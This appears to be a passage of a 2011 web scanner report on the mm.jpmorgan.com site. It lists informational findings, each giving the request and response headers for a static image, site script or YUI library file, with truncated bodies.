HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT Date: Tue, 12 Jul 2011 16:30:25 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31 Accept-Ranges: bytes ETag: W/"170-1310119378000" Last-Modified: Fri, 08 Jul 2011 10:02:58 GMT Cache-Control: max-age=432000 Expires: Sun, 17 Jul 2011 16:30:25 GMT Vary: Accept-Encoding P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Length: 170 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: image/gif GIF89a.........q..[..J..? .9.F..2iF.5.VZ.h..P.....ERB.4!.; |
Severity: | Information |
Confidence: | Certain |
Host: | https://mm.jpmorgan.com |
Path: | /images/btn_hover_right |
GET /images/btn_hover_right Host: mm.jpmorgan.com Connection: keep-alive Referer: https://mm.jpmorgan.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utma=214076236 |
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT Date: Tue, 12 Jul 2011 16:30:26 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31 Accept-Ranges: bytes ETag: W/"170-1310119378000" Last-Modified: Fri, 08 Jul 2011 10:02:58 GMT Cache-Control: max-age=432000 Expires: Sun, 17 Jul 2011 16:30:26 GMT Vary: Accept-Encoding P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Length: 170 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: image/gif GIF89a.........q..[..J..? |
Severity: | Information |
Confidence: | Certain |
Host: | https://mm.jpmorgan.com |
Path: | /images/btn_left_side.gif |
GET /images/btn_left_side.gif HTTP/1.1 Host: mm.jpmorgan.com Connection: keep-alive Referer: https://mm.jpmorgan.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utma=214076236 |
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT Date: Tue, 12 Jul 2011 16:29:57 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31 Accept-Ranges: bytes ETag: W/"175-1310119380000" Last-Modified: Fri, 08 Jul 2011 10:03:00 GMT Cache-Control: max-age=432000 Expires: Sun, 17 Jul 2011 16:29:57 GMT Vary: Accept-Encoding P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Length: 175 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: image/gif GIF89a................... ..E. ..; |
Severity: | Information |
Confidence: | Certain |
Host: | https://mm.jpmorgan.com |
Path: | /images/btn_right_side |
GET /images/btn_right_side Host: mm.jpmorgan.com Connection: keep-alive Referer: https://mm.jpmorgan.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utma=214076236 |
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT Date: Tue, 12 Jul 2011 16:29:57 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31 Accept-Ranges: bytes ETag: W/"174-1310119378000" Last-Modified: Fri, 08 Jul 2011 10:02:58 GMT Cache-Control: max-age=432000 Expires: Sun, 17 Jul 2011 16:29:57 GMT Vary: Accept-Encoding P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Length: 174 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: image/gif GIF89a................... ..`.< -.h...; |
Severity: | Information |
Confidence: | Certain |
Host: | https://mm.jpmorgan.com |
Path: | /images/icons/attention |
GET /images/icons/attention Host: mm.jpmorgan.com Connection: keep-alive Referer: https://mm.jpmorgan.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utma=214076236 |
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT Date: Tue, 12 Jul 2011 16:30:27 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31 Accept-Ranges: bytes ETag: W/"709-1310119382000" Last-Modified: Fri, 08 Jul 2011 10:03:02 GMT Cache-Control: max-age=432000 Expires: Sun, 17 Jul 2011 16:30:27 GMT Vary: Accept-Encoding P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Length: 709 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: image/gif GIF89a.....v..c..\..Q.... ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://mm.jpmorgan.com |
Path: | /images/menu_bg_img.jpg |
GET /images/menu_bg_img.jpg HTTP/1.1 Host: mm.jpmorgan.com Connection: keep-alive Referer: https://mm.jpmorgan.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utma=214076236 |
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT Date: Tue, 12 Jul 2011 16:29:57 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31 Accept-Ranges: bytes ETag: W/"4057-1310119380000" Last-Modified: Fri, 08 Jul 2011 10:03:00 GMT Cache-Control: max-age=300 Expires: Tue, 12 Jul 2011 16:34:57 GMT Vary: Accept-Encoding P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Length: 4057 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: image/jpeg ......JFIF.....d.d..... . . ..... ........................... ......................... ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://mm.jpmorgan.com |
Path: | /index.jsp |
GET /index.jsp?pageName Host: mm.jpmorgan.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utma=214076236 |
HTTP/1.1 302 Found Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT Date: Tue, 12 Jul 2011 16:29:21 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31 Location: https://iblogin.jpmorgan Vary: Accept-Encoding Content-Length: 386 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="https://iblogin ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://mm.jpmorgan.com |
Path: | /js/dropdowns.js |
GET /js/dropdowns.js HTTP/1.1 Host: mm.jpmorgan.com Connection: keep-alive Referer: https://mm.jpmorgan.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utma=214076236 |
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT Date: Tue, 12 Jul 2011 16:29:52 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31 Accept-Ranges: bytes ETag: W/"23404-1310119354000" Last-Modified: Fri, 08 Jul 2011 10:02:34 GMT Cache-Control: max-age=300 Expires: Tue, 12 Jul 2011 16:34:52 GMT Vary: Accept-Encoding P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Length: 23404 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/javascript // Function to get a new XML Http Request object function AJAXRequest() { if (window.XMLHttpRequest) { return new XMLHttpRequest(); } else if (window.ActiveXObject) { return new ActiveXOb ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://mm.jpmorgan.com |
Path: | /js/feedback.js |
GET /js/feedback.js HTTP/1.1 Host: mm.jpmorgan.com Connection: keep-alive Referer: https://mm.jpmorgan.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utma=214076236 |
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT Date: Tue, 12 Jul 2011 16:29:52 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31 Accept-Ranges: bytes ETag: W/"0-1310119354000" Last-Modified: Fri, 08 Jul 2011 10:02:34 GMT Cache-Control: max-age=300 Expires: Tue, 12 Jul 2011 16:34:52 GMT Vary: Accept-Encoding P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Length: 0 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/javascript |
Severity: | Information |
Confidence: | Certain |
Host: | https://mm.jpmorgan.com |
Path: | /js/gecFunctions.js |
GET /js/gecFunctions.js HTTP/1.1 Host: mm.jpmorgan.com Connection: keep-alive Referer: https://mm.jpmorgan.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utma=214076236 |
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT Date: Tue, 12 Jul 2011 16:29:52 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31 Accept-Ranges: bytes ETag: W/"1705-1310119354000" Last-Modified: Fri, 08 Jul 2011 10:02:34 GMT Cache-Control: max-age=300 Expires: Tue, 12 Jul 2011 16:34:52 GMT Vary: Accept-Encoding P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Length: 1705 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/javascript var submitGecForm = function() { if (document.getElementById( document.getElementById( ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://mm.jpmorgan.com |
Path: | /js/menu.js |
GET /js/menu.js HTTP/1.1 Host: mm.jpmorgan.com Connection: keep-alive Referer: https://mm.jpmorgan.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utma=214076236 |
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT Date: Tue, 12 Jul 2011 16:29:51 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31 Accept-Ranges: bytes ETag: W/"6916-1310119354000" Last-Modified: Fri, 08 Jul 2011 10:02:34 GMT Cache-Control: max-age=300 Expires: Tue, 12 Jul 2011 16:34:51 GMT Vary: Accept-Encoding P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Length: 6916 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/javascript function hideMenus(element) { if(YAHOO.env.ua.ie == 6) { return; } var lines = YAHOO.util.Dom.getEl var subLines = YAHOO.util.Dom.getElemen ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://mm.jpmorgan.com |
Path: | /js/personalisation.js |
GET /js/personalisation.js HTTP/1.1 Host: mm.jpmorgan.com Connection: keep-alive Referer: https://mm.jpmorgan.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utma=214076236 |
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT Date: Tue, 12 Jul 2011 16:29:52 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31 Accept-Ranges: bytes ETag: W/"15959-1310119354000" Last-Modified: Fri, 08 Jul 2011 10:02:34 GMT Cache-Control: max-age=300 Expires: Tue, 12 Jul 2011 16:34:52 GMT Vary: Accept-Encoding P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Length: 15959 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/javascript //Function to get a new XML Http Request object function AJAXRequest() { if (window.XMLHttpRequest) { return new XMLHttpRequest(); } else if (window.ActiveXObject) { return new ActiveXObj ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://mm.jpmorgan.com |
Path: | /js/portalBondIndex.js |
GET /js/portalBondIndex.js HTTP/1.1 Host: mm.jpmorgan.com Connection: keep-alive Referer: https://mm.jpmorgan.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utma=214076236 |
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT Date: Tue, 12 Jul 2011 16:29:53 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31 Accept-Ranges: bytes ETag: W/"8066-1310119358000" Last-Modified: Fri, 08 Jul 2011 10:02:38 GMT Cache-Control: max-age=300 Expires: Tue, 12 Jul 2011 16:34:53 GMT Vary: Accept-Encoding P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Length: 8066 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/javascript function makeUrl(url) { //prefixUrl = "http://morganmarkets prefixUrl = ""; fullUrl = prefixUrl + url; return fullUrl; } function docLoc(relUrl) { //prefix = 'http://mo ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://mm.jpmorgan.com |
Path: | /js/portlet.js |
GET /js/portlet.js HTTP/1.1 Host: mm.jpmorgan.com Connection: keep-alive Referer: https://mm.jpmorgan.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utma=214076236 |
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT Date: Tue, 12 Jul 2011 16:29:51 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31 Accept-Ranges: bytes ETag: W/"7376-1310119356000" Last-Modified: Fri, 08 Jul 2011 10:02:36 GMT Cache-Control: max-age=300 Expires: Tue, 12 Jul 2011 16:34:51 GMT Vary: Accept-Encoding P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Length: 7376 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/javascript function refreshAllCheckBoxDivs { // var displayMaxRows = 10; var portletDiv = document.getElementById var visibleDivs = 0; var chec ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://mm.jpmorgan.com |
Path: | /js/yui/button-min.js |
GET /js/yui/button-min.js HTTP/1.1 Host: mm.jpmorgan.com Connection: keep-alive Referer: https://mm.jpmorgan.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utma=214076236 |
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT Date: Tue, 12 Jul 2011 16:29:54 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31 Accept-Ranges: bytes ETag: W/"27973-1310119356000" Last-Modified: Fri, 08 Jul 2011 10:02:36 GMT Cache-Control: max-age=300 Expires: Tue, 12 Jul 2011 16:34:54 GMT Vary: Accept-Encoding P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Length: 27973 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/javascript /* Copyright (c) 2010, Yahoo! Inc. All rights reserved. Code licensed under the BSD License: http://developer.yahoo version: 2.8.1 */ (function(){var G=YAHOO.util.Dom,M=YAHOO ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://mm.jpmorgan.com |
Path: | /js/yui/connection-min.js |
GET /js/yui/connection-min.js HTTP/1.1 Host: mm.jpmorgan.com Connection: keep-alive Referer: https://mm.jpmorgan.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utma=214076236 |
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT Date: Tue, 12 Jul 2011 16:29:49 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31 Accept-Ranges: bytes ETag: W/"13048-1310119356000" Last-Modified: Fri, 08 Jul 2011 10:02:36 GMT Cache-Control: max-age=300 Expires: Tue, 12 Jul 2011 16:34:49 GMT Vary: Accept-Encoding P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Length: 13048 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/javascript /* Copyright (c) 2010, Yahoo! Inc. All rights reserved. Code licensed under the BSD License: http://developer.yahoo version: 2.8.1 */ YAHOO.util.Connect={ ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://mm.jpmorgan.com |
Path: | /js/yui/container-min.js |
GET /js/yui/container-min.js HTTP/1.1 Host: mm.jpmorgan.com Connection: keep-alive Referer: https://mm.jpmorgan.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utma=214076236 |
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT Date: Tue, 12 Jul 2011 16:29:55 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31 Accept-Ranges: bytes ETag: W/"74941-1310119356000" Last-Modified: Fri, 08 Jul 2011 10:02:36 GMT Cache-Control: max-age=300 Expires: Tue, 12 Jul 2011 16:34:55 GMT Vary: Accept-Encoding P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Length: 74941 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/javascript /* Copyright (c) 2010, Yahoo! Inc. All rights reserved. Code licensed under the BSD License: http://developer.yahoo version: 2.8.1 */ (function(){YAHOO.util ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://mm.jpmorgan.com |
Path: | /js/yui/element-min.js |
GET /js/yui/element-min.js HTTP/1.1 Host: mm.jpmorgan.com Connection: keep-alive Referer: https://mm.jpmorgan.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utma=214076236 |
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT Date: Tue, 12 Jul 2011 16:29:49 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31 Accept-Ranges: bytes ETag: W/"9242-1310119356000" Last-Modified: Fri, 08 Jul 2011 10:02:36 GMT Cache-Control: max-age=300 Expires: Tue, 12 Jul 2011 16:34:49 GMT Vary: Accept-Encoding P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Length: 9242 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/javascript /* Copyright (c) 2009, Yahoo! Inc. All rights reserved. Code licensed under the BSD License: http://developer.yahoo version: 2.8.0r4 */ YAHOO.util.Attribute ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://mm.jpmorgan.com |
Path: | /js/yui/event-delegate |
GET /js/yui/event-delegate Host: mm.jpmorgan.com Connection: keep-alive Referer: https://mm.jpmorgan.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utma=214076236 |
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT Date: Tue, 12 Jul 2011 16:29:49 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31 Accept-Ranges: bytes ETag: W/"1506-1310119356000" Last-Modified: Fri, 08 Jul 2011 10:02:36 GMT Cache-Control: max-age=300 Expires: Tue, 12 Jul 2011 16:34:49 GMT Vary: Accept-Encoding P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Length: 1506 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/javascript /* Copyright (c) 2010, Yahoo! Inc. All rights reserved. Code licensed under the BSD License: http://developer.yahoo version: 2.8.1 */ (function(){var A=YAHOO.util.Event,C=YA ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://mm.jpmorgan.com |
Path: | /js/yui/selector-min.js |
GET /js/yui/selector-min.js HTTP/1.1 Host: mm.jpmorgan.com Connection: keep-alive Referer: https://mm.jpmorgan.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utma=214076236 |
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT Date: Tue, 12 Jul 2011 16:29:49 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31 Accept-Ranges: bytes ETag: W/"7809-1310119356000" Last-Modified: Fri, 08 Jul 2011 10:02:36 GMT Cache-Control: max-age=300 Expires: Tue, 12 Jul 2011 16:34:49 GMT Vary: Accept-Encoding P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Length: 7809 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/javascript /* Copyright (c) 2010, Yahoo! Inc. All rights reserved. Code licensed under the BSD License: http://developer.yahoo version: 2.8.1 */ (function(){var A=YAHOO.util;A.Selector ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://mm.jpmorgan.com |
Path: | /js/yui/tabview-min.js |
GET /js/yui/tabview-min.js HTTP/1.1 Host: mm.jpmorgan.com Connection: keep-alive Referer: https://mm.jpmorgan.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utma=214076236 |
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT Date: Tue, 12 Jul 2011 16:29:54 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31 Accept-Ranges: bytes ETag: W/"9929-1310119356000" Last-Modified: Fri, 08 Jul 2011 10:02:36 GMT Cache-Control: max-age=300 Expires: Tue, 12 Jul 2011 16:34:54 GMT Vary: Accept-Encoding P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Length: 9929 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/javascript /* Copyright (c) 2009, Yahoo! Inc. All rights reserved. Code licensed under the BSD License: http://developer.yahoo version: 2.8.0r4 */ (function(){var B=YAHOO.util,C=B.Dom,H=B ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://mm.jpmorgan.com |
Path: | /js/yui/treeview-min.js |
GET /js/yui/treeview-min.js HTTP/1.1 Host: mm.jpmorgan.com Connection: keep-alive Referer: https://mm.jpmorgan.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utma=214076236 |
